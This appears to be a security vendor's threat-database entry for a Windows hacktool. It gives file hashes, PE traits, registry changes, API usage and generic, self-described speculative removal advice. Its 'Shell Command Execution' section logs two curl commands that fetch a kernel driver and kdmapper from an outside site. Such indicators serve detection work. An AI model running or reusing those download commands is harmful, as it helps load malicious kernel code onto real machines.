Threat Database Hacktool Hacktool.TelegramHack.EE

Hacktool.TelegramHack.EE

By CagedTech in Hacktool

Threat Scorecard

Threat Level: 50 % (Medium)
Infected Computers: 7
First Seen: June 15, 2025
Last Seen: February 7, 2026
OS(es) Affected: Windows

The detection of Hacktool.TelegramHack.EE on your system indicates a potential security threat that requires immediate attention. This detection name suggests that the malware is related to hacking tools, specifically designed to exploit vulnerabilities in the Telegram messaging platform. It is essential to understand the nature of this threat and take prompt action to remove it from your system to prevent further damage.

What Is Hacktool.TelegramHack.EE?

Hacktool.TelegramHack.EE is a type of malware that falls under the category of hacking tools. These tools are designed to exploit vulnerabilities in software applications, in this case, potentially Telegram, to gain unauthorized access or control over a system. The primary purpose of such tools is to facilitate malicious activities, such as data theft, espionage, or the distribution of other malware. Understanding that Hacktool.TelegramHack.EE is identified as a hacktool implies it's used for malicious hacking activities, but without more specific information, its exact capabilities and intentions remain speculative.

How Hacktool.TelegramHack.EE Operates

Malware like Hacktool.TelegramHack.EE typically operates by exploiting weaknesses in system security or application vulnerabilities. Once inside a system, it can perform a variety of malicious actions, including but not limited to, stealing sensitive information, installing additional malware, or providing backdoor access to the attackers. The specifics of how Hacktool.TelegramHack.EE operates would depend on its design and the intentions of its creators, which can vary widely among different types of hacking tools.

Symptoms of Infection

Symptoms of an infection can vary, but common indicators include unusual system behavior, such as slow performance, unexpected pop-ups, or changes in system settings without user input. In some cases, the presence of malware like Hacktool.TelegramHack.EE might not be immediately apparent, as it may be designed to operate stealthily in the background. However, vigilant monitoring of system activity and regular security checks can help in early detection and mitigation of potential threats.

How to Remove Hacktool.TelegramHack.EE

  1. Boot into Safe Mode with Networking: This will help prevent the malware from loading and give you a clean environment to work in.
  2. Perform a Full Scan with a Reputable Tool: Utilize a trusted anti-malware tool, such as SpyHunter, to scan your system thoroughly for any malicious components. Ensure the tool is updated to the latest version for the best detection and removal capabilities.
  3. Uninstall Suspicious Programs: Review your installed programs and remove any that you do not recognize or that were installed around the time of the suspected infection.
  4. Reset Browsers: If your web browsers (Chrome, Firefox, Edge, etc.) have been affected, resetting them to their default settings can help remove any malicious extensions or settings changes made by the malware.
  5. Reboot and Re-scan: After taking the above steps, restart your computer and perform another scan with your anti-malware tool to ensure that all components of the malware have been removed.

Conclusion

The removal of Hacktool.TelegramHack.EE requires a systematic approach to ensure that all malicious components are eliminated from your system. By following the steps outlined above and maintaining good security practices, such as keeping your operating system and software up to date, using strong antivirus software, and being cautious with emails and downloads, you can significantly reduce the risk of future infections. Remember, vigilance and proactive security measures are key to protecting your digital assets in today's evolving cybersecurity landscape.

Analysis Report

General information

Family Name: Hacktool.TelegramHack.EE
Signature status: No Signature

Known Samples

MD5: 67d1899e6c0d4443655d4ab56540559b
SHA1: 28554442a54de1737dfb17db9333a595d2c01c10
SHA256: FF71EC11C260FEB90B6B35BEA5FCA309FA25A18A9198F3583A09CA5AB660C429
File Size: 370.69 KB, 370688 bytes
MD5: 37dccd9b3086aa1ebc8ae608d46774d3
SHA1: c66febbe0f32f911b10d23130d6f8b7966029788
SHA256: D72F4FBB2B90A897342624A66311561643D8228B35D1FA62EE27AF8BD1FEE343
File Size: 310.78 KB, 310784 bytes
MD5: 9421930570d4eab4e7f6bca778d781a4
SHA1: 5d73f9b405aada7a5b45e33a9c6e239db83bfbfb
SHA256: 0412422027A6A0412B51AB1195FA2C9FBFA3729F67AD91C4D310ACA67C751963
File Size: 313.86 KB, 313856 bytes
MD5: 3c23db5f4d17cd54b33dd3dfe6ead9c8
SHA1: f266e7019ce403da2796ecf7f28dd87926aa7ae0
SHA256: E7F2C0CAD4222806B0D0C655C677531916CBEF96DE2C28D7EDADCB7A05867DAE
File Size: 511.49 KB, 511488 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have security information
  • File has TLS information
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
Show More
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Traits

  • GetConsoleWindow
  • imgui
  • No Version Info
  • VirtualQueryEx
  • x64

Block Information

Total Blocks: 957
Potentially Malicious Blocks: 110
Whitelisted Blocks: 831
Unknown Blocks: 16

Visual Map

0 0 0 0 0 0 0 ? ? ? ? 0 ? 0 0 0 0 x ? 0 ? ? ? 0 0 ? 0 0 0 0 0 x x 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 x x x ? x 0 0 0 0 x x 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 x ? x x x x 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 x x 0 0 0 x x 0 x 0 0 0 0 0 0 0 0 x x 0 x x x 0 0 x 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 1 0 0 0 0 0 1 0 0 1 0 0 1 0 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 x 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 x x 0 x 0 0 x 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 x 0 x 0 0 0 x 0 0 x 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x x x x 0 0 x 0 x x 0 0 0 0 0 0 0 0 0 0 0 0 x 0 x x 0 0 x x 0 0 x x 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 x x 0 0 x x 0 0 0 ? x 0 0 x x x x x 0 0 x 0 x 0 0 x 0 x 0 x 0 0 x 1 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x 0 0 0 0 0 x x 0 0 x x x 0 x 0 0 0 x 0 0 0 0 x x 0 0 0 x 0 x x x x x 0 0 x 0 0 0 0 0 x 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 x ? x x x 0 x 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Agent.TRG
  • Gamehack.KT

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ᯎ➓ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 룯ୣ⦳ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ꕯ୯⦳ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 迀୻⦳ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ﴡొ⦳ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 坴ഇ⦳ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAllocateReserveObject
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
Show More
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRemoveIoCompletion
  • ntdll.dll!NtRemoveIoCompletionEx
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetIoCompletion
  • ntdll.dll!NtSetIoCompletionEx
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForMultipleObjects
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • ntdll.dll!NtWriteVirtualMemory
  • ntdll.dll!NtYieldExecution
  • UNKNOWN
  • win32u.dll!NtUserCallNoParam

6 additional items are not displayed above.

Process Shell Execute
  • CreateProcess
Network Winsock2
  • WSAStartup
Network Winsock
  • accept
  • bind
  • closesocket
  • connect
  • freeaddrinfo
  • getaddrinfo
  • getpeername
  • getsockname
  • recv
  • send
Show More
  • setsockopt
  • socket
Keyboard Access
  • GetAsyncKeyState

Shell Command Execution

C:\WINDOWS\system32\curl.exe curl https://anonhax.site/uploads/premium.sys --output C:\driver.sys
C:\WINDOWS\system32\curl.exe curl https://anonhax.site/uploads/kd3241f.bin --output C:\kdmapper.exe

Related Posts

Trending

Most Viewed

Loading...